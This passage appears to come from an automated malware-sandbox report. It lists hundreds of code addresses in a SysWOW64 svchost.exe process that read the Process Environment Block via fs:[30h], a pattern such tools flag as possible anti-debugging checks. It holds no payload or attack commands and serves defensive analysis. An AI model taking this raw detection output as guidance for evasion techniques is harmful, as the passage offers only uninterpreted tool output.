                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322A250 mov eax, dword ptr fs:[00000030h] 4_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03236259 mov eax, dword ptr fs:[00000030h] 4_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032EA250 mov eax, dword ptr fs:[00000030h] 4_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032402A0 mov eax, dword ptr fs:[00000030h] 4_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h] 4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032C62A0 mov ecx, dword ptr fs:[00000030h] 4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326E284 mov eax, dword ptr fs:[00000030h] 4_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B0283 mov eax, dword ptr fs:[00000030h] 4_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032402E1 mov eax, dword ptr fs:[00000030h] 4_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_033062D6 mov eax, dword ptr fs:[00000030h] 4_2_033062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03260124 mov eax, dword ptr fs:[00000030h] 4_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h] 4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h] 4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov ecx, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F0115 mov eax, dword ptr fs:[00000030h]4_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304164 mov eax, dword ptr fs:[00000030h]4_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304164 mov eax, dword ptr fs:[00000030h]4_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov ecx, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C156 mov eax, dword ptr fs:[00000030h]4_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C8158 mov eax, dword ptr fs:[00000030h]4_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236154 mov eax, dword ptr fs:[00000030h]4_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236154 mov eax, dword ptr fs:[00000030h]4_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03270185 mov eax, dword ptr fs:[00000030h]4_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EC188 mov eax, dword ptr fs:[00000030h]4_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EC188 mov eax, dword ptr fs:[00000030h]4_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4180 mov eax, dword ptr fs:[00000030h]4_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4180 mov eax, dword ptr fs:[00000030h]4_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033061E5 mov eax, dword ptr fs:[00000030h]4_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032601F8 mov eax, dword ptr fs:[00000030h]4_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F61C3 mov eax, dword ptr fs:[00000030h]4_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F61C3 mov eax, dword ptr fs:[00000030h]4_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A020 mov eax, dword ptr fs:[00000030h]4_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C020 mov eax, dword ptr fs:[00000030h]4_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6030 mov eax, dword ptr fs:[00000030h]4_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B4000 mov ecx, dword ptr fs:[00000030h]4_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325C073 mov eax, dword ptr fs:[00000030h]4_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232050 mov eax, dword ptr fs:[00000030h]4_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6050 mov eax, dword ptr fs:[00000030h]4_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032280A0 mov eax, dword ptr fs:[00000030h]4_2_032280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C80A8 mov eax, dword ptr fs:[00000030h]4_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F60B8 mov eax, dword ptr fs:[00000030h]4_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F60B8 mov ecx, dword ptr fs:[00000030h]4_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323208A mov eax, dword ptr fs:[00000030h]4_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032380E9 mov eax, dword ptr fs:[00000030h]4_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B60E0 mov eax, dword ptr fs:[00000030h]4_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C0F0 mov eax, dword ptr fs:[00000030h]4_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032720F0 mov ecx, dword ptr fs:[00000030h]4_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B20DE mov eax, dword ptr fs:[00000030h]4_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C720 mov eax, dword ptr fs:[00000030h]4_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C720 mov eax, dword ptr fs:[00000030h]4_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov eax, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov ecx, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov eax, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AC730 mov eax, dword ptr fs:[00000030h]4_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C700 mov eax, dword ptr fs:[00000030h]4_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230710 mov eax, dword ptr fs:[00000030h]4_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03260710 mov eax, dword ptr fs:[00000030h]4_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238770 mov eax, dword ptr fs:[00000030h]4_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov esi, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov eax, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov eax, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230750 mov eax, dword ptr fs:[00000030h]4_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE75D mov eax, dword ptr fs:[00000030h]4_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272750 mov eax, dword ptr fs:[00000030h]4_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272750 mov eax, dword ptr fs:[00000030h]4_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B4755 mov eax, dword ptr fs:[00000030h]4_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032307AF mov eax, dword ptr fs:[00000030h]4_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E47A0 mov eax, dword ptr fs:[00000030h]4_2_032E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D678E mov eax, dword ptr fs:[00000030h]4_2_032D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE7E1 mov eax, dword ptr fs:[00000030h]4_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032347FB mov eax, dword ptr fs:[00000030h]4_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032347FB mov eax, dword ptr fs:[00000030h]4_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323C7C0 mov eax, dword ptr fs:[00000030h]4_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B07C3 mov eax, dword ptr fs:[00000030h]4_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E627 mov eax, dword ptr fs:[00000030h]4_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03266620 mov eax, dword ptr fs:[00000030h]4_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268620 mov eax, dword ptr fs:[00000030h]4_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323262C mov eax, dword ptr fs:[00000030h]4_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE609 mov eax, dword ptr fs:[00000030h]4_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272619 mov eax, dword ptr fs:[00000030h]4_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F866E mov eax, dword ptr fs:[00000030h]4_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F866E mov eax, dword ptr fs:[00000030h]4_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A660 mov eax, dword ptr fs:[00000030h]4_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A660 mov eax, dword ptr fs:[00000030h]4_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03262674 mov eax, dword ptr fs:[00000030h]4_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324C640 mov eax, dword ptr fs:[00000030h]4_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C6A6 mov eax, dword ptr fs:[00000030h]4_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032666B0 mov eax, dword ptr fs:[00000030h]4_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234690 mov eax, dword ptr fs:[00000030h]4_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234690 mov eax, dword ptr fs:[00000030h]4_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B06F1 mov eax, dword ptr fs:[00000030h]4_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B06F1 mov eax, dword ptr fs:[00000030h]4_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A6C7 mov eax, dword ptr fs:[00000030h]4_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6500 mov eax, dword ptr fs:[00000030h]4_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238550 mov eax, dword ptr fs:[00000030h]4_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238550 mov eax, dword ptr fs:[00000030h]4_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032545B1 mov eax, dword ptr fs:[00000030h]4_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032545B1 mov eax, dword ptr fs:[00000030h]4_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232582 mov eax, dword ptr fs:[00000030h]4_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232582 mov ecx, dword ptr fs:[00000030h]4_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03264588 mov eax, dword ptr fs:[00000030h]4_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E59C mov eax, dword ptr fs:[00000030h]4_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032325E0 mov eax, dword ptr fs:[00000030h]4_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C5ED mov eax, dword ptr fs:[00000030h]4_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C5ED mov eax, dword ptr fs:[00000030h]4_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E5CF mov eax, dword ptr fs:[00000030h]4_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E5CF mov eax, dword ptr fs:[00000030h]4_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032365D0 mov eax, dword ptr fs:[00000030h]4_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A5D0 mov eax, dword ptr fs:[00000030h]4_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A5D0 mov eax, dword ptr fs:[00000030h]4_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C427 mov eax, dword ptr fs:[00000030h]4_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A430 mov eax, dword ptr fs:[00000030h]4_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BC460 mov ecx, dword ptr fs:[00000030h]4_2_032BC460
